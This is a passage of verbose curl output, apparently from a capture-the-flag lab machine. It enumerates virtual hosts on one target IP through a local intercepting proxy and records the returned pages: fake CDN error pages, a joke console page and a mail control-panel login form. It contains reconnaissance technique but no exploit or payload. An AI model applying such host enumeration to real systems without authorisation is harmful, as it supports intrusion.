  712.    <span class="cf-footer-separator">•</span>
  713.    <span class="cf-footer-item"><span>Performance &amp; security by</span> <a href="https://clownware.htb/link.php" id="brand_link" target="https://clownware.htb/link.php">ClownWare</a></span>
  714.    
  715.  </p>
  716. </div><!-- /.error-footer -->
  717.  
  718.  
  719.    </div><!-- /#cf-error-details -->
  720.  </div><!-- /#cf-wrapper -->
  721.  
  722.  <script type="text/javascript">
  723.  window._cf_translation = {};
  724.  
  725.  
  726. </script>
  727.  
  728.  
  729.  
  730. * Closing connection 0
  731. * TLSv1.2 (OUT), TLS alert, Client hello (1):
  732. </body></html>
  733.  
  734. *.clownware.htb
  735. ---------------------* Uses proxy env variable no_proxy == 'localhost,127.0.0.0/8,::1'
  736. * Uses proxy env variable https_proxy == 'http://127.0.0.1:8080/'
  737. *   Trying 127.0.0.1...
  738. * TCP_NODELAY set
  739. * Connected to 127.0.0.1 (127.0.0.1) port 8080 (#0)
  740. * allocate connect buffer!
  741. * Establish HTTP proxy tunnel to 10.10.10.144:443
  742. > CONNECT 10.10.10.144:443 HTTP/1.1
  743. > Host: 10.10.10.144:443
  744. > User-Agent: curl/7.61.0
  745. > Proxy-Connection: Keep-Alive
  746. >
  747. < HTTP/1.0 200 Connection established
  748. <
  749. * Proxy replied 200 to CONNECT request
  750. * CONNECT phase completed!
  751. * ALPN, offering h2
  752. * ALPN, offering http/1.1
  753. * successfully set certificate verify locations:
  754. *   CAfile: none
  755.  CApath: /etc/ssl/certs
  756. * (304) (OUT), TLS handshake, Client hello (1):
  757. * CONNECT phase completed!
  758. * CONNECT phase completed!
  759. * (304) (IN), TLS handshake, Server hello (2):
  760. * TLSv1.2 (IN), TLS handshake, Certificate (11):
  761. * TLSv1.2 (IN), TLS handshake, Server key exchange (12):
  762. * TLSv1.2 (IN), TLS handshake, Server finished (14):
  763. * TLSv1.2 (OUT), TLS handshake, Client key exchange (16):
  764. * TLSv1.2 (OUT), TLS change cipher, Client hello (1):
  765. * TLSv1.2 (OUT), TLS handshake, Finished (20):
  766. * TLSv1.2 (IN), TLS handshake, Finished (20):
  767. * SSL connection using TLSv1.2 / ECDHE-RSA-AES256-GCM-SHA384
  768. * ALPN, server did not agree to a protocol
  769. * Server certificate:
  770. *  subject: C=PortSwigger; O=PortSwigger; OU=PortSwigger CA; CN=ClownWare.htb
  771. *  start date: Jan 21 17:26:12 2014 GMT
  772. *  expire date: Jan 21 17:26:12 2038 GMT
  773. *  issuer: C=PortSwigger; ST=PortSwigger; L=PortSwigger; O=PortSwigger; OU=PortSwigger CA; CN=PortSwigger CA
  774. *  SSL certificate verify result: self signed certificate in certificate chain (19), continuing anyway.
  775. > GET / HTTP/1.1
  776. > Host: *.clownware.htb
  777. > User-Agent: curl/7.61.0
  778. > Accept: */*
  779. >
  780. < HTTP/1.1 200 OK
  781. < Date: Thu, 20 Dec 2018 00:41:09 GMT
  782. < Content-Type: text/html; charset=UTF-8
  783. < Connection: close
  784. < Server: ClownWare Proxy
  785. < Content-Length: 3475
  786. <
  787. <!DOCTYPE html>
  788. <!--[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->
  789. <!--[if IE 7]>    <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->
  790. <!--[if IE 8]>    <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->
  791. <!--[if gt IE 8]><!-->
  792. <html class="js" style="opacity: 1; visibility: visible;" lang="en-US"><!--<![endif]--><head>
  793. <title>Direct IP access not allowed | ClownWare</title>
  794. <meta charset="UTF-8">
  795. <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
  796. <meta http-equiv="X-UA-Compatible" content="IE=Edge,chrome=1">
  797. <meta name="robots" content="noindex, nofollow">
  798. <meta name="viewport" content="width=device-width,initial-scale=1,maximum-scale=1">
  799. <link rel="stylesheet" id="cf_styles-css" href="index_files/cf.css" type="text/css" media="screen,projection">
  800. <!--[if lt IE 9]><link rel="stylesheet" id='cf_styles-ie-css' href="/cdn-cgi/styles/cf.errors.ie.css" type="text/css" media="screen,projection" /><![endif]-->
  801. <style type="text/css">body{margin:0;padding:0}</style>
  802.  
  803.  
  804. <!--[if gte IE 10]><!--><script type="text/javascript" src="index_files/zepto.js"></script><!--<![endif]-->
  805. <!--[if gte IE 10]><!--><script type="text/javascript" src="index_files/cf.js"></script><!--<![endif]-->
  806.  
  807.  
  808.  
  809. </head>
  810. <body>
  811.  <div id="cf-wrapper">
  812.    <div class="cf-alert cf-alert-error cf-cookie-error" id="cookie-alert" data-translate="enable_cookies">Please enable cookies.</div>
  813.    <div id="cf-error-details" class="cf-error-details-wrapper">
  814.      <div class="cf-wrapper cf-header cf-error-overview">
  815.        <h1>
  816.          <span class="cf-error-type" data-translate="error">Error</span>
  817.          <span class="cf-error-code">1003</span>
  818.          <small class="heading-ray-id">Ray ID: b78687238673cee4
  819. • 2018-12-20 00:41:09 GMT
  820. </small>
  821.        </h1>
  822.        <h2 class="cf-subheadline">Direct IP access not allowed</h2>
  823.      </div><!-- /.header -->
  824.  
  825.      <section></section><!-- spacer -->
  826.  
  827.      <div class="cf-section cf-wrapper">
  828.        <div class="cf-columns two">
  829.          <div class="cf-column">
  830.            <h2 data-translate="what_happened">What happened?</h2>
  831.            <p>You've requested an IP address that is part of the <a href="https://clownware.htb/link.php" target="https://clownware.htb/link.php">ClownWare</a> network. A valid Host header must be supplied to reach the desired website.</p>
  832.           </div>
  833.  
  834.          
  835.           <div class="cf-column">
  836.             <h2 data-translate="what_can_i_do">What can I do?</h2>
  837.             <p>If you are interested in learning more about ClownWare, please <a href="https://clownware.htb/link.php" target="https://clownware.htb/link.php">visit our website</a>.</p>
  838.           </div>
  839.          
  840.         </div>
  841.       </div><!-- /.section -->
  842.  
  843.       <div class="cf-error-footer cf-wrapper">
  844.   <p>
  845.     <span class="cf-footer-item">ClownWare Ray ID: <strong>8a277d1d4b193fab
  846. </strong></span>
  847.     <span class="cf-footer-separator"></span>
  848.     <span class="cf-footer-item"><span>Your IP</span>: 20.20.20.81</span>
  849.     <span class="cf-footer-separator"></span>
  850.     <span class="cf-footer-item"><span>Performance &amp; security by</span> <a href="https://clownware.htb/link.php" id="brand_link" target="https://clownware.htb/link.php">ClownWare</a></span>
  851.    
  852.   </p>
  853. </div><!-- /.error-footer -->
  854.  
  855.  
  856.     </div><!-- /#cf-error-details -->
  857.   </div><!-- /#cf-wrapper -->
  858.  
  859.   <script type="text/javascript">
  860.   window._cf_translation = {};
  861.  
  862.  
  863. </script>
  864.  
  865.  
  866.  
  867. * Closing connection 0
  868. * TLSv1.2 (OUT), TLS alert, Client hello (1):
  869. </body></html>
  870.  
  871. proxy.clownware.htb
  872. ---------------------* Uses proxy env variable no_proxy == 'localhost,127.0.0.0/8,::1'
  873. * Uses proxy env variable https_proxy == 'http://127.0.0.1:8080/'
  874. *   Trying 127.0.0.1...
  875. * TCP_NODELAY set
  876. * Connected to 127.0.0.1 (127.0.0.1) port 8080 (#0)
  877. * allocate connect buffer!
  878. * Establish HTTP proxy tunnel to 10.10.10.144:443
  879. > CONNECT 10.10.10.144:443 HTTP/1.1
  880. > Host: 10.10.10.144:443
  881. > User-Agent: curl/7.61.0
  882. > Proxy-Connection: Keep-Alive
  883. >
  884. < HTTP/1.0 200 Connection established
  885. <
  886. * Proxy replied 200 to CONNECT request
  887. * CONNECT phase completed!
  888. * ALPN, offering h2
  889. * ALPN, offering http/1.1
  890. * successfully set certificate verify locations:
  891. *   CAfile: none
  892.   CApath: /etc/ssl/certs
  893. * (304) (OUT), TLS handshake, Client hello (1):
  894. * CONNECT phase completed!
  895. * CONNECT phase completed!
  896. * (304) (IN), TLS handshake, Server hello (2):
  897. * TLSv1.2 (IN), TLS handshake, Certificate (11):
  898. * TLSv1.2 (IN), TLS handshake, Server key exchange (12):
  899. * TLSv1.2 (IN), TLS handshake, Server finished (14):
  900. * TLSv1.2 (OUT), TLS handshake, Client key exchange (16):
  901. * TLSv1.2 (OUT), TLS change cipher, Client hello (1):
  902. * TLSv1.2 (OUT), TLS handshake, Finished (20):
  903. * TLSv1.2 (IN), TLS handshake, Finished (20):
  904. * SSL connection using TLSv1.2 / ECDHE-RSA-AES256-GCM-SHA384
  905. * ALPN, server did not agree to a protocol
  906. * Server certificate:
  907. *  subject: C=PortSwigger; O=PortSwigger; OU=PortSwigger CA; CN=ClownWare.htb
  908. *  start date: Jan 21 17:26:12 2014 GMT
  909. *  expire date: Jan 21 17:26:12 2038 GMT
  910. *  issuer: C=PortSwigger; ST=PortSwigger; L=PortSwigger; O=PortSwigger; OU=PortSwigger CA; CN=PortSwigger CA
  911. *  SSL certificate verify result: self signed certificate in certificate chain (19), continuing anyway.
  912. > GET / HTTP/1.1
  913. > Host: proxy.clownware.htb
  914. > User-Agent: curl/7.61.0
  915. > Accept: */*
  916. >
  917. < HTTP/1.1 200 OK
  918. < Date: Thu, 20 Dec 2018 00:41:09 GMT
  919. < Content-Type: text/html; charset=UTF-8
  920. < Connection: close
  921. < Server: ClownWare Proxy
  922. < Content-Length: 3475
  923. <
  924. <!DOCTYPE html>
  925. <!--[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->
  926. <!--[if IE 7]>    <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->
  927. <!--[if IE 8]>    <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->
  928. <!--[if gt IE 8]><!-->
  929. <html class="js" style="opacity: 1; visibility: visible;" lang="en-US"><!--<![endif]--><head>
  930. <title>Direct IP access not allowed | ClownWare</title>
  931. <meta charset="UTF-8">
  932. <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
  933. <meta http-equiv="X-UA-Compatible" content="IE=Edge,chrome=1">
  934. <meta name="robots" content="noindex, nofollow">
  935. <meta name="viewport" content="width=device-width,initial-scale=1,maximum-scale=1">
  936. <link rel="stylesheet" id="cf_styles-css" href="index_files/cf.css" type="text/css" media="screen,projection">
  937. <!--[if lt IE 9]><link rel="stylesheet" id='cf_styles-ie-css' href="/cdn-cgi/styles/cf.errors.ie.css" type="text/css" media="screen,projection" /><![endif]-->
  938. <style type="text/css">body{margin:0;padding:0}</style>
  939.  
  940.  
  941. <!--[if gte IE 10]><!--><script type="text/javascript" src="index_files/zepto.js"></script><!--<![endif]-->
  942. <!--[if gte IE 10]><!--><script type="text/javascript" src="index_files/cf.js"></script><!--<![endif]-->
  943.  
  944.  
  945.  
  946. </head>
  947. <body>
  948.   <div id="cf-wrapper">
  949.     <div class="cf-alert cf-alert-error cf-cookie-error" id="cookie-alert" data-translate="enable_cookies">Please enable cookies.</div>
  950.     <div id="cf-error-details" class="cf-error-details-wrapper">
  951.       <div class="cf-wrapper cf-header cf-error-overview">
  952.         <h1>
  953.           <span class="cf-error-type" data-translate="error">Error</span>
  954.           <span class="cf-error-code">1003</span>
  955.           <small class="heading-ray-id">Ray ID: 30f832a0efc934e2
  956.  • 2018-12-20 00:41:09 GMT
  957. </small>
  958.         </h1>
  959.         <h2 class="cf-subheadline">Direct IP access not allowed</h2>
  960.       </div><!-- /.header -->
  961.  
  962.       <section></section><!-- spacer -->
  963.  
  964.       <div class="cf-section cf-wrapper">
  965.         <div class="cf-columns two">
  966.           <div class="cf-column">
  967.             <h2 data-translate="what_happened">What happened?</h2>
  968.             <p>You've requested an IP address that is part of the <a href="https://clownware.htb/link.php" target="https://clownware.htb/link.php">ClownWare</a> network. A valid Host header must be supplied to reach the desired website.</p>
  969.          </div>
  970.  
  971.          
  972.          <div class="cf-column">
  973.            <h2 data-translate="what_can_i_do">What can I do?</h2>
  974.            <p>If you are interested in learning more about ClownWare, please <a href="https://clownware.htb/link.php" target="https://clownware.htb/link.php">visit our website</a>.</p>
  975.          </div>
  976.          
  977.        </div>
  978.      </div><!-- /.section -->
  979.  
  980.      <div class="cf-error-footer cf-wrapper">
  981.  <p>
  982.    <span class="cf-footer-item">ClownWare Ray ID: <strong>30240e4c416065eb
  983. </strong></span>
  984.    <span class="cf-footer-separator">•</span>
  985.    <span class="cf-footer-item"><span>Your IP</span>: 20.20.20.81</span>
  986.    <span class="cf-footer-separator">•</span>
  987.    <span class="cf-footer-item"><span>Performance &amp; security by</span> <a href="https://clownware.htb/link.php" id="brand_link" target="https://clownware.htb/link.php">ClownWare</a></span>
  988.    
  989.  </p>
  990. </div><!-- /.error-footer -->
  991.  
  992.  
  993.    </div><!-- /#cf-error-details -->
  994.  </div><!-- /#cf-wrapper -->
  995.  
  996.  <script type="text/javascript">
  997.  window._cf_translation = {};
  998.  
  999.  
  1000. </script>
  1001.  
  1002.  
  1003.  
  1004. * Closing connection 0
  1005. * TLSv1.2 (OUT), TLS alert, Client hello (1):
  1006. </body></html>
  1007.  
  1008. console.flujab.htb
  1009. ---------------------* Uses proxy env variable no_proxy == 'localhost,127.0.0.0/8,::1'
  1010. * Uses proxy env variable https_proxy == 'http://127.0.0.1:8080/'
  1011. *   Trying 127.0.0.1...
  1012. * TCP_NODELAY set
  1013. * Connected to 127.0.0.1 (127.0.0.1) port 8080 (#0)
  1014. * allocate connect buffer!
  1015. * Establish HTTP proxy tunnel to 10.10.10.144:443
  1016. > CONNECT 10.10.10.144:443 HTTP/1.1
  1017. > Host: 10.10.10.144:443
  1018. > User-Agent: curl/7.61.0
  1019. > Proxy-Connection: Keep-Alive
  1020. >
  1021. < HTTP/1.0 200 Connection established
  1022. <
  1023. * Proxy replied 200 to CONNECT request
  1024. * CONNECT phase completed!
  1025. * ALPN, offering h2
  1026. * ALPN, offering http/1.1
  1027. * successfully set certificate verify locations:
  1028. *   CAfile: none
  1029.  CApath: /etc/ssl/certs
  1030. * (304) (OUT), TLS handshake, Client hello (1):
  1031. * CONNECT phase completed!
  1032. * CONNECT phase completed!
  1033. * (304) (IN), TLS handshake, Server hello (2):
  1034. * TLSv1.2 (IN), TLS handshake, Certificate (11):
  1035. * TLSv1.2 (IN), TLS handshake, Server key exchange (12):
  1036. * TLSv1.2 (IN), TLS handshake, Server finished (14):
  1037. * TLSv1.2 (OUT), TLS handshake, Client key exchange (16):
  1038. * TLSv1.2 (OUT), TLS change cipher, Client hello (1):
  1039. * TLSv1.2 (OUT), TLS handshake, Finished (20):
  1040. * TLSv1.2 (IN), TLS handshake, Finished (20):
  1041. * SSL connection using TLSv1.2 / ECDHE-RSA-AES256-GCM-SHA384
  1042. * ALPN, server did not agree to a protocol
  1043. * Server certificate:
  1044. *  subject: C=PortSwigger; O=PortSwigger; OU=PortSwigger CA; CN=ClownWare.htb
  1045. *  start date: Jan 21 17:26:12 2014 GMT
  1046. *  expire date: Jan 21 17:26:12 2038 GMT
  1047. *  issuer: C=PortSwigger; ST=PortSwigger; L=PortSwigger; O=PortSwigger; OU=PortSwigger CA; CN=PortSwigger CA
  1048. *  SSL certificate verify result: self signed certificate in certificate chain (19), continuing anyway.
  1049. > GET / HTTP/1.1
  1050. > Host: console.flujab.htb
  1051. > User-Agent: curl/7.61.0
  1052. > Accept: */*
  1053. >
  1054. < HTTP/1.1 200 OK
  1055. < Date: Thu, 20 Dec 2018 00:41:10 GMT
  1056. < Content-Type: text/html; charset=UTF-8
  1057. < Connection: close
  1058. < Server: ClownWare Proxy
  1059. < Content-Length: 519
  1060. <
  1061. <!DOCTYPE html>
  1062. <html>
  1063.    <head>
  1064.        <title>Access Granted!</title>
  1065.        <embed src="/dialup.m4a" volume="60" height="0" width="0" autostart="true" loop="true"  width="0" height="0">
  1066.    </head>
  1067.        <style type="text/css">
  1068.            body {
  1069.                background-color: #000;
  1070.            }
  1071.            img {
  1072.            width: 70%;
  1073.            height: auto;
  1074.        }
  1075.        </style>
  1076.    </head>
  1077.    <body>
  1078.        <center>
  1079.            <img src="/console.gif"/>
  1080.  
  1081.        </center>
  1082.    </body>
  1083. * Closing connection 0
  1084. * TLSv1.2 (OUT), TLS alert, Client hello (1):
  1085. </html>
  1086.  
  1087. sys.flujab.htb
  1088. ---------------------* Uses proxy env variable no_proxy == 'localhost,127.0.0.0/8,::1'
  1089. * Uses proxy env variable https_proxy == 'http://127.0.0.1:8080/'
  1090. *   Trying 127.0.0.1...
  1091. * TCP_NODELAY set
  1092. * Connected to 127.0.0.1 (127.0.0.1) port 8080 (#0)
  1093. * allocate connect buffer!
  1094. * Establish HTTP proxy tunnel to 10.10.10.144:443
  1095. > CONNECT 10.10.10.144:443 HTTP/1.1
  1096. > Host: 10.10.10.144:443
  1097. > User-Agent: curl/7.61.0
  1098. > Proxy-Connection: Keep-Alive
  1099. >
  1100. < HTTP/1.0 200 Connection established
  1101. <
  1102. * Proxy replied 200 to CONNECT request
  1103. * CONNECT phase completed!
  1104. * ALPN, offering h2
  1105. * ALPN, offering http/1.1
  1106. * successfully set certificate verify locations:
  1107. *   CAfile: none
  1108.  CApath: /etc/ssl/certs
  1109. * (304) (OUT), TLS handshake, Client hello (1):
  1110. * CONNECT phase completed!
  1111. * CONNECT phase completed!
  1112. * (304) (IN), TLS handshake, Server hello (2):
  1113. * TLSv1.2 (IN), TLS handshake, Certificate (11):
  1114. * TLSv1.2 (IN), TLS handshake, Server key exchange (12):
  1115. * TLSv1.2 (IN), TLS handshake, Server finished (14):
  1116. * TLSv1.2 (OUT), TLS handshake, Client key exchange (16):
  1117. * TLSv1.2 (OUT), TLS change cipher, Client hello (1):
  1118. * TLSv1.2 (OUT), TLS handshake, Finished (20):
  1119. * TLSv1.2 (IN), TLS handshake, Finished (20):
  1120. * SSL connection using TLSv1.2 / ECDHE-RSA-AES256-GCM-SHA384
  1121. * ALPN, server did not agree to a protocol
  1122. * Server certificate:
  1123. *  subject: C=PortSwigger; O=PortSwigger; OU=PortSwigger CA; CN=ClownWare.htb
  1124. *  start date: Jan 21 17:26:12 2014 GMT
  1125. *  expire date: Jan 21 17:26:12 2038 GMT
  1126. *  issuer: C=PortSwigger; ST=PortSwigger; L=PortSwigger; O=PortSwigger; OU=PortSwigger CA; CN=PortSwigger CA
  1127. *  SSL certificate verify result: self signed certificate in certificate chain (19), continuing anyway.
  1128. > GET / HTTP/1.1
  1129. > Host: sys.flujab.htb
  1130. > User-Agent: curl/7.61.0
  1131. > Accept: */*
  1132. >
  1133. < HTTP/1.1 200 OK
  1134. < Date: Thu, 20 Dec 2018 00:41:10 GMT
  1135. < Content-Type: text/html; charset=UTF-8
  1136. < Connection: close
  1137. < Server: ClownWare Proxy
  1138. < Content-Length: 3475
  1139. <
  1140. <!DOCTYPE html>
  1141. <!--[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->
  1142. <!--[if IE 7]>    <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->
  1143. <!--[if IE 8]>    <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->
  1144. <!--[if gt IE 8]><!-->
  1145. <html class="js" style="opacity: 1; visibility: visible;" lang="en-US"><!--<![endif]--><head>
  1146. <title>Direct IP access not allowed | ClownWare</title>
  1147. <meta charset="UTF-8">
  1148. <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
  1149. <meta http-equiv="X-UA-Compatible" content="IE=Edge,chrome=1">
  1150. <meta name="robots" content="noindex, nofollow">
  1151. <meta name="viewport" content="width=device-width,initial-scale=1,maximum-scale=1">
  1152. <link rel="stylesheet" id="cf_styles-css" href="index_files/cf.css" type="text/css" media="screen,projection">
  1153. <!--[if lt IE 9]><link rel="stylesheet" id='cf_styles-ie-css' href="/cdn-cgi/styles/cf.errors.ie.css" type="text/css" media="screen,projection" /><![endif]-->
  1154. <style type="text/css">body{margin:0;padding:0}</style>
  1155.  
  1156.  
  1157. <!--[if gte IE 10]><!--><script type="text/javascript" src="index_files/zepto.js"></script><!--<![endif]-->
  1158. <!--[if gte IE 10]><!--><script type="text/javascript" src="index_files/cf.js"></script><!--<![endif]-->
  1159.  
  1160.  
  1161.  
  1162. </head>
  1163. <body>
  1164.  <div id="cf-wrapper">
  1165.    <div class="cf-alert cf-alert-error cf-cookie-error" id="cookie-alert" data-translate="enable_cookies">Please enable cookies.</div>
  1166.    <div id="cf-error-details" class="cf-error-details-wrapper">
  1167.      <div class="cf-wrapper cf-header cf-error-overview">
  1168.        <h1>
  1169.          <span class="cf-error-type" data-translate="error">Error</span>
  1170.          <span class="cf-error-code">1003</span>
  1171.          <small class="heading-ray-id">Ray ID: 2489ba982fd37a16
  1172. • 2018-12-20 00:41:10 GMT
  1173. </small>
  1174.        </h1>
  1175.        <h2 class="cf-subheadline">Direct IP access not allowed</h2>
  1176.      </div><!-- /.header -->
  1177.  
  1178.      <section></section><!-- spacer -->
  1179.  
  1180.      <div class="cf-section cf-wrapper">
  1181.        <div class="cf-columns two">
  1182.          <div class="cf-column">
  1183.            <h2 data-translate="what_happened">What happened?</h2>
  1184.            <p>You've requested an IP address that is part of the <a href="https://clownware.htb/link.php" target="https://clownware.htb/link.php">ClownWare</a> network. A valid Host header must be supplied to reach the desired website.</p>
  1185.           </div>
  1186.  
  1187.          
  1188.           <div class="cf-column">
  1189.             <h2 data-translate="what_can_i_do">What can I do?</h2>
  1190.             <p>If you are interested in learning more about ClownWare, please <a href="https://clownware.htb/link.php" target="https://clownware.htb/link.php">visit our website</a>.</p>
  1191.           </div>
  1192.          
  1193.         </div>
  1194.       </div><!-- /.section -->
  1195.  
  1196.       <div class="cf-error-footer cf-wrapper">
  1197.   <p>
  1198.     <span class="cf-footer-item">ClownWare Ray ID: <strong>d35bedc6ad2f159a
  1199. </strong></span>
  1200.     <span class="cf-footer-separator"></span>
  1201.     <span class="cf-footer-item"><span>Your IP</span>: 20.20.20.81</span>
  1202.     <span class="cf-footer-separator"></span>
  1203.     <span class="cf-footer-item"><span>Performance &amp; security by</span> <a href="https://clownware.htb/link.php" id="brand_link" target="https://clownware.htb/link.php">ClownWare</a></span>
  1204.    
  1205.   </p>
  1206. </div><!-- /.error-footer -->
  1207.  
  1208.  
  1209.     </div><!-- /#cf-error-details -->
  1210.   </div><!-- /#cf-wrapper -->
  1211.  
  1212.   <script type="text/javascript">
  1213.   window._cf_translation = {};
  1214.  
  1215.  
  1216. </script>
  1217.  
  1218.  
  1219.  
  1220. * Closing connection 0
  1221. * TLSv1.2 (OUT), TLS alert, Client hello (1):
  1222. </body></html>
  1223.  
  1224. smtp.flujab.htb
  1225. ---------------------* Uses proxy env variable no_proxy == 'localhost,127.0.0.0/8,::1'
  1226. * Uses proxy env variable https_proxy == 'http://127.0.0.1:8080/'
  1227. *   Trying 127.0.0.1...
  1228. * TCP_NODELAY set
  1229. * Connected to 127.0.0.1 (127.0.0.1) port 8080 (#0)
  1230. * allocate connect buffer!
  1231. * Establish HTTP proxy tunnel to 10.10.10.144:443
  1232. > CONNECT 10.10.10.144:443 HTTP/1.1
  1233. > Host: 10.10.10.144:443
  1234. > User-Agent: curl/7.61.0
  1235. > Proxy-Connection: Keep-Alive
  1236. >
  1237. < HTTP/1.0 200 Connection established
  1238. <
  1239. * Proxy replied 200 to CONNECT request
  1240. * CONNECT phase completed!
  1241. * ALPN, offering h2
  1242. * ALPN, offering http/1.1
  1243. * successfully set certificate verify locations:
  1244. *   CAfile: none
  1245.   CApath: /etc/ssl/certs
  1246. * (304) (OUT), TLS handshake, Client hello (1):
  1247. * CONNECT phase completed!
  1248. * CONNECT phase completed!
  1249. * (304) (IN), TLS handshake, Server hello (2):
  1250. * TLSv1.2 (IN), TLS handshake, Certificate (11):
  1251. * TLSv1.2 (IN), TLS handshake, Server key exchange (12):
  1252. * TLSv1.2 (IN), TLS handshake, Server finished (14):
  1253. * TLSv1.2 (OUT), TLS handshake, Client key exchange (16):
  1254. * TLSv1.2 (OUT), TLS change cipher, Client hello (1):
  1255. * TLSv1.2 (OUT), TLS handshake, Finished (20):
  1256. * TLSv1.2 (IN), TLS handshake, Finished (20):
  1257. * SSL connection using TLSv1.2 / ECDHE-RSA-AES256-GCM-SHA384
  1258. * ALPN, server did not agree to a protocol
  1259. * Server certificate:
  1260. *  subject: C=PortSwigger; O=PortSwigger; OU=PortSwigger CA; CN=ClownWare.htb
  1261. *  start date: Jan 21 17:26:12 2014 GMT
  1262. *  expire date: Jan 21 17:26:12 2038 GMT
  1263. *  issuer: C=PortSwigger; ST=PortSwigger; L=PortSwigger; O=PortSwigger; OU=PortSwigger CA; CN=PortSwigger CA
  1264. *  SSL certificate verify result: self signed certificate in certificate chain (19), continuing anyway.
  1265. > GET / HTTP/1.1
  1266. > Host: smtp.flujab.htb
  1267. > User-Agent: curl/7.61.0
  1268. > Accept: */*
  1269. >
  1270. < HTTP/1.1 200 OK
  1271. < Date: Thu, 20 Dec 2018 00:41:10 GMT
  1272. < Content-Type: text/html; charset=UTF-8
  1273. < Connection: close
  1274. < Server: ClownWare Proxy
  1275. < Content-Length: 4954
  1276. <
  1277. <!DOCTYPE HTML>
  1278. <html>
  1279.     <head>
  1280.         <title>SMTP Mail Box</title>
  1281.         <meta charset="utf-8" />
  1282.         <meta name="viewport" content="width=device-width, initial-scale=1, user-scalable=no"/>
  1283.         <link rel="stylesheet" href="assets/css/main.css"/>
  1284.     </head>
  1285.     <body class="homepage is-preload">
  1286.         <div id="page-wrapper">
  1287.  
  1288.             <!-- Header -->
  1289.                 <section id="header" class="wrapper style3">
  1290.  
  1291.                     <!-- Logo -->
  1292.                         <div id="logo">
  1293.                             <h1><a href="/?login">SMTP Mail Configuration</a></h1>
  1294.                         </br>
  1295.                             <!-- NOW DEPRICATED! This function has been integrated into the new free service application!-->
  1296.                         </div>
  1297.                 </section>
  1298.     <!-- Scripts -->
  1299.     <script src="assets/js/jquery.min.js"></script>
  1300.     <script src="assets/js/jquery.dropotron.min.js"></script>
  1301.     <script src="assets/js/browser.min.js"></script>
  1302.     <script src="assets/js/breakpoints.min.js"></script>
  1303.     <script src="assets/js/util.js"></script>
  1304.     <script src="assets/js/main.js"></script>
  1305. <section id="main" class="wrapper style4">
  1306.  
  1307. <div style="margin: 0 auto; max-width: 32em;">
  1308.     <h2>Log in here for your Mail-in-a-Box control panel.</h2>
  1309.   <form class="form-horizontal" role="form" onsubmit="do_login(); return false;">
  1310.     <div class="form-group">
  1311.       <label for="inputEmail3" class="col-sm-3 control-label">Email</label>
  1312.       <div class="col-sm-9">
  1313.         <input name="email" type="email" class="form-control" id="loginEmail" placeholder="admin@flujab.htb">
  1314.       </div>
  1315.     </div>
  1316.     <div class="form-group">
  1317.       <label for="inputPassword3" class="col-sm-3 control-label">Password</label>
  1318.       <div class="col-sm-9">
  1319.         <input name="password" type="password" class="form-control" id="loginPassword" placeholder="Password">
  1320.       </div>
  1321.     </div>
  1322.     <div class="form-group">
  1323.       <div class="col-sm-offset-3 col-sm-9">
  1324.       </div>
  1325.     </div>
  1326.     <div class="form-group">
  1327.       <div class="col-sm-offset-3 col-sm-9">
  1328.         <div>
  1329.         </div>
  1330.         <button type="submit" class="btn btn-default">Sign in</button>
  1331.       </div>
  1332.     </div>
  1333.   </form>
  1334. </div>
  1335.  
  1336.  
  1337. <script>
  1338. function do_login() {
  1339.   if ($('#loginEmail').val() == "") {
  1340.     show_modal_error("Login Failed", "Enter your email address.", function() {
  1341.     $('#loginEmail').focus();
  1342.     });
  1343.     return false;
  1344.   }
  1345.   if ($('#loginPassword').val() == "") {
  1346.     show_modal_error("Login Failed", "Enter your email password.", function() {
  1347.         $('#loginPassword').focus();
  1348.     });
  1349.     return false;
  1350.   }
  1351.   // Exchange the email address & password for an API key.
  1352.   api_credentials = [$('#loginEmail').val(), $('#loginPassword').val()]
  1353.   api(
  1354.   "/me",
  1355.   "GET",
  1356.   { },
  1357.   function(response){
  1358.     // This API call always succeeds. It returns a JSON object indicating
  1359.     // whether the request was authenticated or not.
  1360.     if (response.status != "ok") {
  1361.       // Show why the login failed.
  1362.       show_modal_error("Login Failed", response.reason)
  1363.       // Reset any saved credentials.
  1364.       do_logout();
  1365.     } else if (!("api_key" in response)) {
  1366.       // Login succeeded but user might not be authorized!
  1367.       show_modal_error("Login Failed", "You are not an administrator on this system.")
  1368.       // Reset any saved credentials.
  1369.       do_logout();
  1370.     } else {
  1371.       // Login succeeded.
  1372.       // Save the new credentials.
  1373.       api_credentials = [response.email, response.api_key];
  1374.       // Try to wipe the username/password information.
  1375.       $('#loginEmail').val('');
  1376.       $('#loginPassword').val('');
  1377.       // Remember the credentials.
  1378.       if (typeof localStorage != 'undefined' && typeof sessionStorage != 'undefined') {
  1379.         if ($('#loginRemember').val()) {
  1380.           localStorage.setItem("miab-cp-credentials", api_credentials.join(":"));
  1381.           sessionStorage.removeItem("miab-cp-credentials");
  1382.         } else {
  1383.           localStorage.removeItem("miab-cp-credentials");
  1384.           sessionStorage.setItem("miab-cp-credentials", api_credentials.join(":"));
  1385.         }
  1386.       }
  1387.       // Open the next panel the user wants to go to. Do this after the XHR response
  1388.       // is over so that we don't start a new XHR request while this one is finishing,
  1389.      // which confuses the loading indicator.
  1390.      setTimeout(function() { show_panel(!switch_back_to_panel || switch_back_to_panel == "login" ? 'system_status' : switch_back_to_panel) }, 300);
  1391.    }
  1392.  })
  1393. }
  1394. function do_logout() {
  1395.  api_credentials = ["", ""];
  1396.  if (typeof localStorage != 'undefined')
  1397.    localStorage.removeItem("miab-cp-credentials");
  1398.  if (typeof sessionStorage != 'undefined')
  1399.    sessionStorage.removeItem("miab-cp-credentials");
  1400.  show_panel('login');
  1401. }
  1402. function show_login() {
  1403.  $('#loginEmail,#loginPassword').each(function() {
  1404.     var input = $(this);
  1405.     if (!$.trim(input.val())) {
  1406.       input.focus();
  1407.       return false;
  1408.     }
  1409.   });
  1410. }
  1411. * Closing connection 0
  1412. * TLSv1.2 (OUT), TLS alert, Client hello (1):
  1413. </script>
  1414.  
  1415. vaccine4flu.htb
